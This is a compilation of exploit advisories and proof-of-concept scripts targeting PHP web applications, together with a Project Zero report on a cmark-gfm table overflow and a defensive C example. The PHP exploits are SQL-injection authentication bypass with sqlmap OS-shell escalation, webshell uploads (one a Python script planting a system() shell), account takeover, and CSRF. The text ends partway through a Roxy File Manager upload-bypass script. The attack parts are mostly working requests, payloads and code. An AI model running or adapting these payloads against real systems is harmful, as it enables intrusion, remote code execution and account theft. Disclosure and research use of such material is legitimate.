<pre><code># Title: Bakery Shop Management System 1.0 - Blind Time-Based SQLi to RCE<br /># Author: Hejap Zairy<br /># Date: 06.04.2022<br /># Vendor: https://www.campcodes.com/projects/php/simple-bakery-shop-management-system/<br /># Software: https://www.campcodes.com/wp-content/uploads/2022/02/bsms_0.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /># Steps<br /># 1 - Go to: https://0day.gov/bsms/login.php<br /># 2 - SQLi authentication bypass [admin'or 1=1 or ''=']<br /># 3 - SQLi to RCE (r00t)<br /># 4 - Upload webshell<br /># 5 - Web shell to Meterpreter full TTY shell<br /><br /><br /># Vulnerable code (PHP)<br /><br />---<br />```php<br /> <?php<br /> $sql = "SELECT p.*,c.name as cname FROM `product_list` p inner join `category_list` c on p.category_id = c.category_id where p.status = 1 and p.delete_flag = 0 order by `name` asc";<br /> $qry = $conn->query($sql);<br /> while($row = $qry->fetch_assoc()):<br /> // product_id is interpolated straight into the two query strings below rather than bound as a parameter<br /> $stock_in = $conn->query("SELECT sum(quantity) as `total` FROM `stock_list` where unix_timestamp(CONCAT(`expiry_date`, ' 23:59:59')) >= unix_timestamp(CURRENT_TIMESTAMP) and product_id = '{$row['product_id']}' ")->fetch_array()['total'];<br /> $stock_out = $conn->query("SELECT sum(quantity) as `total` FROM `transaction_items` where product_id = '{$row['product_id']}' ")->fetch_array()['total'];<br /> $stock_in = $stock_in > 0 ? $stock_in : 0;<br /> $stock_out = $stock_out > 0 ? $stock_out : 0;<br /> $qty = $stock_in-$stock_out;<br /> $qty = $qty > 0 ? $qty : 0;<br />?><br />```<br />---<br /># Status: CRITICAL<br />[+] Payload POST<br /><br />---<br />POST /bsms/Actions.php?a=login HTTP/1.1<br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 48<br />Origin: http://0day.gov<br />Connection: close<br />Referer: https://0day.gov/bsms/login.php<br />Cookie: PHPSESSID=ttdhr0ntd2dte05a2quob2kr3s<br /><br />username=admin'or+1%3D1+or+''%3D'&password=hejap<br />---<br /><br /><br /><br />---<br />Parameter: username (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=admin'or 1=1 or ''='' AND (SELECT 1610 FROM (SELECT(SLEEP(515)))eFaV) AND '515'='515&password=hejap<br />---<br /><br /># Blind time-based SQLi to RCE<br /># Exploit<br /><br />sqlmap -r hejap_0day --dbs --time-sec=10 --threads=10 -D bsms_db -T user_list --dump --eta --technique=t --os-shell<br /><br /># Description:<br />The login form is vulnerable to SQL injection; this can be used to construct an injection that bypasses authentication.<br /><br /><br /># Proof and Exploit:<br />https://i.imgur.com/zR6Mekg.png<br />https://i.imgur.com/RQ1JXeK.png<br />https://i.imgur.com/0x9gepw.png<br /><br /></code></pre>
<pre><code>cmark-gfm: Integer overflow in table extension<br /><br />cmark-gfm (GitHub's Markdown parsing library) is vulnerable to an out-of-bounds write when parsing Markdown tables with a high number of columns, due to an overflow of the 16-bit column count.<br /><br />Support for parsing tables in a GitHub Flavored Markdown file is implemented in extensions/table.c. When a potential table is found, try_opening_table_header is called to parse the table header row (e.g. `| Column 1 | Column 2 |`) and the delimiter/marker row (`| - | :-|`):<br /><br />```c<br />static cmark_node *try_opening_table_header(cmark_syntax_extension *self,<br /> cmark_parser *parser,<br /> cmark_node *parent_container,<br /> unsigned char *input, int len) {<br /> <br /> ...<br /> // Since scan_table_start was successful, we must have a marker row.<br /> marker_row = row_from_string(self, parser,<br /> input + cmark_parser_get_first_nonspace(parser),<br /> len - cmark_parser_get_first_nonspace(parser));<br /> ...<br /> header_row = row_from_string(self, parser, (unsigned char *)parent_string,<br /> (int)strlen(parent_string));<br /> if (!header_row || header_row->n_columns != marker_row->n_columns) {<br /> free_table_row(parser->mem, marker_row);<br /> free_table_row(parser->mem, header_row);<br /> cmark_arena_pop();<br /> return parent_container;<br /> }<br /><br /> ...<br />```<br /><br />When both rows are parsed successfully, try_opening_table_header creates the alignments array to store alignment information for each column in the table:<br />```c<br />uint8_t *alignments =<br /> (uint8_t *)parser->mem->calloc(header_row->n_columns, sizeof(uint8_t));<br /> cmark_llist *it = marker_row->cells;<br /> for (i = 0; it; it = it->next, ++i) {<br /> node_cell *node = (node_cell *)it->data;<br /> bool left = node->buf->ptr[0] == ':', right = node->buf->ptr[node->buf->size - 1] == ':';<br /><br /> if (left && right)<br /> alignments[i] = 'c';<br /> else if (left)<br /> alignments[i] = 'l';<br /> else if (right)<br /> alignments[i] = 'r';<br /> }<br />```<br /><br />The code uses the number of columns in the header row as the size of the array allocation, but loops through all columns in the marker row when filling the array.<br /><br />Normally this isn't a problem, as `header_row->n_columns == marker_row->n_columns` is checked earlier in the code. But the check doesn't work when the real number of columns is larger than `2**16`, as n_columns is defined as a uint16_t and row_from_string does not perform any checks to protect it from overflowing.<br />An attacker can simply create a header row with X columns and a marker row with `2**16+X` columns, and trigger out-of-bounds writes at controlled offsets by setting the alignment of specific columns.<br /><br />Proof of Concept:<br />```<br />$ python3 -c 'print("|a|b|\n|-|-|\n|"+ "A"*1380000 + "|b|\n\n\n"+"|" + "a|" * 2 + "\n|" + ":-|" * (2**16+2) + "\n|a|b|")' > /tmp/test.md<br />$ ./src/cmark-gfm -e table /tmp/test.md<br />=================================================================<br />==2096092==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f3aeaffd800 at pc 0x7f3affa99ca1 bp 0x7fffbb4d5390 sp 0x7fffbb4d5388<br />WRITE of size 1 at 0x7f3aeaffd800 thread T0<br /> #0 0x7f3affa99ca0 in try_opening_table_header /usr/local/google/home/fwilhelm/code/cmark-gfm/extensions/table.c:294<br /> #1 0x7f3affa99ca0 in try_opening_table_block /usr/local/google/home/fwilhelm/code/cmark-gfm/extensions/table.c:390<br /> #2 0x7f3aff9e536c in open_new_blocks /usr/local/google/home/fwilhelm/code/cmark-gfm/src/blocks.c:1286<br /> #3 0x7f3aff9e536c in S_process_line /usr/local/google/home/fwilhelm/code/cmark-gfm/src/blocks.c:1476<br /> #4 0x7f3aff9e6ea0 in S_parser_feed /usr/local/google/home/fwilhelm/code/cmark-gfm/src/blocks.c:730<br /> #5 0x7f3aff9e73fc in cmark_parser_feed /usr/local/google/home/fwilhelm/code/cmark-gfm/src/blocks.c:680<br /> #6
0x563777eaafe4 in main /usr/local/google/home/fwilhelm/code/cmark-gfm/src/main.c:281<br /> #7 0x7f3aff7fa7ec in __libc_start_main ../csu/libc-start.c:332<br /> #8 0x563777eaa2f9 in _start (/usr/local/google/home/fwilhelm/code/cmark-gfm/build/src/cmark-gfm+0x32f9)<br /><br />0x7f3aeaffd800 is located 0 bytes to the right of 9437184-byte region [0x7f3aea6fd800,0x7f3aeaffd800)<br />allocated by thread T0 here:<br /> #0 0x7f3affb58987 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154<br /> #1 0x7f3affa265a6 in alloc_arena_chunk /usr/local/google/home/fwilhelm/code/cmark-gfm/src/arena.c:19<br /> #2 0x7f3affa267a8 in arena_calloc /usr/local/google/home/fwilhelm/code/cmark-gfm/src/arena.c:76<br /> #3 0x7f3affa26a06 in cmark_llist_append /usr/local/google/home/fwilhelm/code/cmark-gfm/src/linked_list.c:7<br /> #4 0x7f3affa99204 in row_from_string /usr/local/google/home/fwilhelm/code/cmark-gfm/extensions/table.c:165<br /> #5 0x7f3affa995cc in try_opening_table_header /usr/local/google/home/fwilhelm/code/cmark-gfm/extensions/table.c:241<br /> #6 0x7f3affa995cc in try_opening_table_block /usr/local/google/home/fwilhelm/code/cmark-gfm/extensions/table.c:390<br /> #7 0x7f3aff9e536c in open_new_blocks /usr/local/google/home/fwilhelm/code/cmark-gfm/src/blocks.c:1286<br /> #8 0x7f3aff9e536c in S_process_line /usr/local/google/home/fwilhelm/code/cmark-gfm/src/blocks.c:1476<br /> #9 0x7f3aff9e6ea0 in S_parser_feed /usr/local/google/home/fwilhelm/code/cmark-gfm/src/blocks.c:730<br /> #10 0x7f3aff9e73fc in cmark_parser_feed /usr/local/google/home/fwilhelm/code/cmark-gfm/src/blocks.c:680<br /> #11 0x563777eaafe4 in main /usr/local/google/home/fwilhelm/code/cmark-gfm/src/main.c:281<br /> #12 0x7f3aff7fa7ec in __libc_start_main ../csu/libc-start.c:332<br /><br />SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/local/google/home/fwilhelm/code/cmark-gfm/extensions/table.c:294 in try_opening_table_header<br />Shadow bytes around the buggy address:<br /> 
0x0fe7dd5f7ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x0fe7dd5f7ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x0fe7dd5f7ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x0fe7dd5f7ae0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x0fe7dd5f7af0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />=>0x0fe7dd5f7b00:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0fe7dd5f7b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0fe7dd5f7b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0fe7dd5f7b30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0fe7dd5f7b40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0fe7dd5f7b50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br />Shadow byte legend (one shadow byte represents 8 application bytes):<br /> Addressable: 00<br /> Partially addressable: 01 02 03 04 05 06 07<br /> Heap left redzone: fa<br /> Freed heap region: fd<br /> Stack left redzone: f1<br /> Stack mid redzone: f2<br /> Stack right redzone: f3<br /> Stack after return: f5<br /> Stack use after scope: f8<br /> Global redzone: f9<br /> Global init order: f6<br /> Poisoned by user: f7<br /> Container overflow: fc<br /> Array cookie: ac<br /> Intra object redzone: bb<br /> ASan internal: fe<br /> Left alloca redzone: ca<br /> Right alloca redzone: cb<br /> Shadow gap: cc<br />==2096092==ABORTING<br />```<br /><br />(The first table is used to fill the arena allocator and trigger a clean crash report from ASAN. It's not required to trigger the bug)<br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-05-16. 
For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html<br /><br />Related CVE Numbers: CVE-2022-24724.<br /><br /><br /><br />Found by: fwilhelm@google.com<br /><br /></code></pre>
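<p>The column-count mismatch the cmark-gfm report above describes, as an added example (not cmark-gfm's code and not the upstream fix): a 16-bit column counter wraps, so a marker row of 2**16 + 2 cells compares equal to a 2-column header, while a counter kept in size_t and bounded by an assumed MAX_COLUMNS cap rejects the row before an alignments array is sized from it. The row splitting, the cap and all function names are assumptions.</p>
<pre><code>
```c
/* Added example, not cmark-gfm's code and not the upstream fix: the report's
 * header/marker column check with two counters side by side, one that wraps
 * like the 16-bit n_columns field and one kept in size_t behind an assumed
 * cap. The row splitting, MAX_COLUMNS and all function names are assumptions. */
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_COLUMNS 0xFFFFu /* assumed cap: the largest value a uint16_t holds */

/* Split a row such as "| a | :- |" into trimmed cells. Every cell is counted;
 * only the first `cap` are recorded (pass 0, NULL, NULL to count only). */
static size_t split_cells(const char *row, size_t cap,
                          const char **cells, size_t *lens) {
    size_t len = strlen(row), i = 0, n = 0;
    while (len > 0 && (row[len - 1] == ' ' || row[len - 1] == '\n')) len--;
    while (i < len && row[i] == ' ') i++;
    if (i < len && row[i] == '|') i++;          /* leading pipe */
    if (len > i && row[len - 1] == '|') len--;  /* trailing pipe */
    for (size_t start = i, j = i;; j++) {
        if (j < len && row[j] != '|') continue; /* still inside a cell */
        size_t s = start, e = j;                /* cell text is [s, e) */
        while (s < e && row[s] == ' ') s++;
        while (e > s && row[e - 1] == ' ') e--;
        if (n < cap) { cells[n] = row + s; lens[n] = e - s; }
        n++;
        if (j == len) break;
        start = j + 1;
    }
    return n;
}

/* Buggy shape: the count lands in a 16-bit field, so 2**16 + 2 cells report
 * as 2 and pass an equality check against a 2-column header. */
static uint16_t count_columns_u16(const char *row) {
    return (uint16_t)split_cells(row, 0, NULL, NULL);
}

/* Hardened shape: count in size_t and refuse anything above the cap. */
static bool count_columns_checked(const char *row, size_t *out) {
    size_t n = split_cells(row, 0, NULL, NULL);
    if (n > MAX_COLUMNS) return false;
    *out = n;
    return true;
}

/* Hardened counterpart of the alignments loop quoted in the report: both rows
 * go through the bounded counter and the loop bound is the allocation size.
 * Returns NULL on overflow or mismatch, otherwise *n_out bytes of 'l', 'r',
 * 'c' or 0 that the caller frees. */
static uint8_t *build_alignments(const char *header, const char *marker,
                                 size_t *n_out) {
    size_t nh, nm;
    if (!count_columns_checked(header, &nh) ||
        !count_columns_checked(marker, &nm) || nh == 0 || nh != nm)
        return NULL;
    const char **cells = calloc(nm, sizeof *cells);
    size_t *lens = calloc(nm, sizeof *lens);
    uint8_t *align = calloc(nm, sizeof *align);
    if (!cells || !lens || !align) {
        free(cells); free(lens); free(align);
        return NULL;
    }
    split_cells(marker, nm, cells, lens);
    for (size_t i = 0; i < nm; i++) {           /* nm == allocation size */
        bool left = lens[i] > 0 && cells[i][0] == ':';
        bool right = lens[i] > 0 && cells[i][lens[i] - 1] == ':';
        align[i] = (left && right) ? 'c' : left ? 'l' : right ? 'r' : 0;
    }
    free(cells); free(lens);
    *n_out = nm;
    return align;
}

/* Constructed input: a marker row "|:-|:-|...|" with `cells` cells, the shape
 * the report's PoC uses with cells = 2**16 + 2. */
static char *make_marker_row(size_t cells) {
    char *row = malloc(cells * 3 + 2);
    if (!row) return NULL;
    row[0] = '|';
    for (size_t i = 0; i < cells; i++) memcpy(row + 1 + i * 3, ":-|", 3);
    row[1 + cells * 3] = '\0';
    return row;
}

int main(void) {
    char *marker = make_marker_row(65536 + 2);      /* 2**16 + 2 cells */
    if (!marker) return 1;
    printf("u16 counts: header=%u marker=%u (marker has wrapped)\n",
           count_columns_u16("|a|b|"), count_columns_u16(marker));
    size_t n = 0;
    uint8_t *a = build_alignments("|a|b|", marker, &n);
    printf("checked build with oversized marker: %s\n", a ? "accepted" : "rejected");
    free(a);
    free(marker);
    return 0;
}
```
</code></pre>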
<pre><code># Title: SAP Information System 1.0 Shell Upload<br /># Author: Hejap Zairy<br /># Date: 05.04.2022<br /># Vendor: https://www.sourcecodester.com/php/15262/sap-information-system-using-phppdo-oop.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/SAP_Information_System.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br />A registered user can bypass the WAF and upload .php.jpg files in the attachments section by intercepting the request (e.g. with Burp Suite) and editing the raw request.<br /><br /><br /># Vulnerable code (JavaScript from the PHP page)<br />The profile-file upload needs more filtering.<br /><br />```javascript<br /> <script><br /> $(document).ready(function() {<br /> load_data();<br /> var count = 1;<br /> function load_data() {<br /> $(document).on('click', '.edit-image', function() {<br /> var beneficiaries_id = $(this).data("image");<br /> get_image(beneficiaries_id); // argument<br /> });<br /> }<br /> function get_image(beneficiaries_id) {<br /> $.ajax({<br /> type: 'POST',<br /> url: 'fetch_row/beneficiaries_row.php',<br /> data: {<br /> beneficiaries_id: beneficiaries_id<br /> },<br /> dataType: 'json',<br /> success: function(response3) {<br /> $('#img_beneficiariesid').val(response3.beneficiaries_id);<br /> $('#img_imageprofile').attr("src", '../../'+ response3.image_profile.slice(0)); // image<br /> }<br /> });<br /> }<br /> });<br /> </script><br />```<br /><br /><br />[+] Payload POST<br /><br /><br />```<br />POST /SAP_Information_System/controllers/edit_householdImage.php HTTP/1.1<br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------3440160751499277351272200964<br />Content-Length: 1343<br />Origin: http://0day.gov<br />Connection: close<br />Referer: http://0day.gov/SAP_Information_System/Dashboard/pages/Beneficiaries.php<br />Cookie: PHPSESSID=rcumpt42s3tngl4b74i4ndrpl9<br /><br />-----------------------------3440160751499277351272200964<br />Content-Disposition: form-data; name="image_profile"; filename="0day_hejap.png.php"<br />Content-Type: image/jpg<br /><br /><?=`$_GET[515]`?><br />-----------------------------3440160751499277351272200964<br />Content-Disposition: form-data; name="beneficiaries_id"<br /><br />5<br />-----------------------------3440160751499277351272200964--<br />```<br /><br /><br /># Status: CRITICAL<br /><br />[+] Payload GET<br /><br />```<br />GET /SAP_Information_System/Uploads/0day_Hejap.php?515=echo+Hejap+Zairy HTTP/1.1<br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Upgrade-Insecure-Requests: 1<br />```<br /><br /># Response<br />```<br />HTTP/1.1 200 OK<br />Date: Tue, 05 Apr 2022 17:56:20 GMT<br />Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27<br />X-Powered-By: PHP/7.4.27<br />Content-Length: 12<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />Hejap Zairy<br />```<br /><br /><br /># Description:<br />The WAF upload bypass occurs when a user uploads an executable script file and then uses that script to execute server-side commands. This attack is the most direct and effective kind, sometimes with almost no technical barriers.<br /><br /><br /># Proof and Exploit:<br />https://i.imgur.com/65biZn6.png<br />https://i.imgur.com/kNOA8dT.png<br />https://i.imgur.com/LMlTPww.png<br /></code></pre>
<pre><code># Exploit Title: Multi Store Inventory Management System - Account Takeover (Unauthenticated)<br /># Date: 04/04/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.bdtask.com/<br /># Software Link: https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/<br /># Version: 1.0<br /># Tested on: XAMPP, Windows 10<br /># Contact: https://twitter.com/dmaral3noz<br /><br /># Description :<br /><br />An attacker can take over any registered 'Staff' user account by sending the POST request below<br />with changed "id", "email", "password", "firstname" and "lastname" parameters.<br /><br /><br /># Steps to Reproduce :<br /><br />1. Send the POST request below with changed "id", "email" and "password" parameters.<br /><br />2. Log in to the user account with the changed email and password.<br /><br /><br />################################################<br /><br /><br />POST /multistore_demo/dashboard/home/setting HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------246162487211952414471071914687<br />Content-Length: 1645<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/multistore_demo/dashboard/home/setting<br />Cookie: ci_session=31504fa8fdcd43505beff1b210056ec12d5d8405<br />Upgrade-Insecure-Requests: 1<br /><br />-----------------------------246162487211952414471071914687<br />Content-Disposition: form-data; name="id"<br /><br />1<br />-----------------------------246162487211952414471071914687<br />Content-Disposition: form-data; name="firstname"<br /><br />saud<br />-----------------------------246162487211952414471071914687<br />Content-Disposition: form-data; 
name="lastname"<br /><br />test<br />-----------------------------246162487211952414471071914687<br />Content-Disposition: form-data; name="email"<br /><br />s3od@hi.com<br />-----------------------------246162487211952414471071914687<br />Content-Disposition: form-data; name="password"<br /><br />admin123<br />-----------------------------246162487211952414471071914687<br />Content-Disposition: form-data; name="about"<br /><br /><br />-----------------------------246162487211952414471071914687<br />Content-Disposition: form-data; name="old_image"<br /><br /><br />-----------------------------246162487211952414471071914687<br />Content-Disposition: form-data; name="image"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------246162487211952414471071914687--<br /></code></pre>
<pre><code># Exploit Title: Multi Store Inventory Management System - Information Disclosure<br /># Date: 04/04/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.bdtask.com/<br /># Software Link: https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/<br /># Version: 1.0<br /># Tested on: XAMPP, Windows 10<br /># Contact: https://twitter.com/dmaral3noz<br /><br /># Description :<br /><br />The application allows directory listing and thereby discloses sensitive files<br />(such as the database installation script used in the PoC below), whose<br />contents an attacker can leverage.<br /><br /><br />################################################<br /><br />PoC HTML :<br /><br /><html><br /><head><br /><title>Multi Store Inventory Management System - Information Disclosure</title><br /></head><br /><body><br /><iframe src="http://127.0.0.1/multistore_demo/install/sql/install.sql"></iframe><br /></body><br /></html><br /></code></pre>
<pre><code># Exploit Title: Online Banquet Booking System - 'change admin credentials' Cross-Site Request Forgery (CSRF)<br /># Date: 04/04/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://phpgurukul.com<br /># Software Link: https://phpgurukul.com/online-banquet-booking-system-using-php-and-mysql/<br /># Version: 1.0<br /># Tested on: XAMPP, Linux<br /># Contact: https://twitter.com/dmaral3noz<br /><br /># Description :<br /><br />The application does not use any security token to protect against CSRF. Therefore, a malicious user can change the admin credentials with a crafted POST request.<br /><br /><br /># HTTP Request :<br /><br />POST /obbs/admin/admin-profile.php HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 86<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/obbs/admin/admin-profile.php<br />Cookie: PHPSESSID=5lotcnigq4mddq3rr6tnnlvn3e<br />Upgrade-Insecure-Requests: 1<br /><br />adminname=Admin&username=admin&email=admin%40gmail.com&mobilenumber=5689784589&submit=<br /><br /><br /># PoC HTML :<br /><br /><html><br /> <!-- CSRF PoC - Saud --><br /> <body><br /> <script>history.pushState('', '', '/')</script><br /> <form action="http://localhost/obbs/admin/admin-profile.php" method="POST"><br /> <input type="hidden" name="adminname" value="Admin" /><br /> <input type="hidden" name="username" value="admin" /><br /> <input type="hidden" name="email" value="admin@gmail.com" /><br /> <input type="hidden" name="mobilenumber" value="123" /><br /> <input type="hidden" name="submit" value="" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br /></code></pre>
<pre><code># Exploit Title: Gadget Store Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)<br /># Date: 04/04/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.campcodes.com/<br /># Software Link: https://www.campcodes.com/projects/php/gadget-store-management-system/<br /># Version: 1.0<br /># Tested on: XAMPP, Linux<br /># Contact: https://twitter.com/dmaral3noz<br /><br /><br /><br />*- URL: "http://localhost:80/gadgetsdb/addproduct.php"<br />*- File path: http://localhost/gadgetsdb/upload/shell.php<br /><br />---------------------------------------------------<br /><br /><br />#!/usr/bin/env python3<br />import requests<br /><br />print ('''<br />#################################################################################################### <br /># Gadget Store Management System 1.0 - Remote Code Execution (Unauthenticated) #<br /># BY:Saud Alenazi #<br /># 0xSaudi #<br />####################################################################################################<br />''')<br /><br />url = "http://localhost:80/gadgetsdb/addproduct.php"<br /><br />saud0 = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------4587377838466971711694098865", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/gadgetsdb/product.php", "Upgrade-Insecure-Requests": "1"}<br />saud1 = "-----------------------------4587377838466971711694098865\r\nContent-Disposition: form-data; name=\"pname\"\r\n\r\ntest\r\n-----------------------------4587377838466971711694098865\r\nContent-Disposition: form-data; name=\"category\"\r\n\r\n4\r\n-----------------------------4587377838466971711694098865\r\nContent-Disposition: form-data; 
name=\"price\"\r\n\r\n100\r\n-----------------------------4587377838466971711694098865\r\nContent-Disposition: form-data; name=\"photo\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php\r\nif($_REQUEST['s']) {\r\n system($_REQUEST['s']);\r\n } else phpinfo();\r\n?>\r\n</pre>\r\n</body>\r\n</html>\r\n-----------------------------4587377838466971711694098865--\r\n"<br />requests.post(url, headers=saud0, data=saud1)<br /><br /></code></pre>
<pre><code># Exploit Title: Roxy File Manager 1.4.5 PHP File Upload Restriction Bypass<br /># Exploit Author: Adam Shebani (NULLHE4D)<br /># Date: 07/03/2022<br /># Software: Roxy File Manager<br /># Version: 1.4.5<br /># CVE: CVE-2018-20525<br /># Vendor Homepage: http://www.roxyfileman.com/<br /># Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-php<br /># Tested on: PHP 7.2 on Ubuntu 20.04 LTS and PHP 7.4 on Windows 10<br /><br /><br /># Roxy File Manager 1.4.5 restricts uploading files with certain<br /># extensions, including various PHP extensions. These forbidden<br /># extensions are configured in a file called 'conf.json' at the root<br /># of the file manager's code base. Sections #1 and #1.1 at<br /># https://www.exploit-db.com/exploits/46085 demonstrate a directory<br /># traversal vulnerability that allows exfiltrating arbitrary<br /># directories by copying them to a directory accessible through the<br /># file manager's web interface. The same vulnerability can be used<br /># to overwrite the 'conf.json' file by copying a directory<br /># containing a modified configuration file that has been uploaded.<br /># The directory must have the same name as the original<br /># configuration file's parent directory (usually 'fileman'). 
The<br /># source and destination directories will be merged and files from<br /># the destination directory get overwritten by the ones from the<br /># source if they have the same name.<br /><br /><br />import argparse, requests, json, re<br />from urllib.parse import urlparse, quote_plus<br />from random import randint<br />#from os import remove<br />from os.path import isfile<br /><br /><br />def failure():<br /> print("[*] it is advised to manually cleanup any files/directories created on the target by this exploit")<br /> exit(1)<br /><br /><br />argparser = argparse.ArgumentParser()<br />argparser.add_argument("-u", "--url", type=str, action="store", help="The URL to the target Roxy File Manager instance (e.g. http://localhost/fileman/)", required=True)<br />argparser.add_argument("-f", "--file", type=str, action="store", help="The PHP file to upload (e.g. shell.php)", required=True)<br />args = argparser.parse_args()<br /><br />roxy_url = args.url<br />php_file = args.file<br />if not isfile(php_file):<br /> print("[-] specified PHP file not found")<br /> exit(1)<br /><br />user_agent = "Mozilla/5.0 (Windows NT 6.4; rv:75.0.0) Gecko/20100101 Firefox/75.0.0"<br />headers = {"User-Agent": user_agent}<br />form_headers = {"User-Agent": user_agent, "Content-Type": "application/x-www-form-urlencoded"}<br />roxy_url += "" if roxy_url.endswith("/") else "/"<br />roxy_hostname = urlparse(roxy_url).hostname<br />uploads_path = urlparse(roxy_url).path + "Uploads"<br /><br /><br /># verify Roxy File Manager instance<br />res = requests.get(roxy_url, headers=headers, allow_redirects=False)<br />if res.status_code == 200 and "<title>Roxy file manager</title>" in res.text:<br /> print("[+] verified Roxy File Manager instance at " + roxy_url)<br />else:<br /> print("[-] couldn't find a Roxy File Manager instance at the specified URL")<br /> exit(1)<br /><br /><br /># get conf.json<br />url = roxy_url + "conf.json"<br />res = requests.get(url, headers=headers)<br />if 
res.status_code == 200:<br /> orig_conf = res.text<br /> orig_conf_json = json.loads(orig_conf)<br /> extensions = orig_conf_json["FORBIDDEN_UPLOADS"].split()<br /> if "php" not in extensions:<br /> print("[*] PHP files are already not forbidden from being uploaded")<br /> exit(0)<br />else:<br /> print("[-] couldn't find conf.json")<br /> exit(1)<br /><br /><br /># verify directory traversal vulnerability in fileslist<br />url = roxy_url + "php/fileslist.php"<br />body = "d={}&type=".format(quote_plus(uploads_path+"/.."))<br />res = requests.post(url, headers=form_headers, data=body)<br />res_json = json.loads(res.text)<br />if res.status_code == 200 and len(res_json) > 0 and "conf.json" in res.text:<br /> print("[+] verified directory traversal vulnerability in fileslist")<br />else:<br /> print("[-] couldn't verify directory traversal vulnerability in fileslist")<br /> exit(1)<br /><br /><br /># create fileman directory structure<br />url = roxy_url + "php/createdir.php"<br />random_dirname = "".join([str(randint(0,9)) for i in range(10)])<br />body = "d={}&n={}".format(quote_plus(uploads_path), random_dirname)<br />res = requests.post(url, headers=form_headers, data=body)<br />if '"res":"ok"' not in res.text:<br /> print("[-] failed to create fileman directory structure")<br /> exit(1)<br />tmp_path = uploads_path + "/" + random_dirname<br /><br />body = "d={}&n={}".format(quote_plus(tmp_path), "fileman")<br />res = requests.post(url, headers=form_headers, data=body)<br />if '"res":"ok"' not in res.text:<br /> print("[-] failed to create fileman directory structure")<br /> failure()<br />fileman_path = tmp_path + "/fileman"<br /><br /><br /># upload modified conf.json<br />url = roxy_url + "php/upload.php"<br /># raw string: 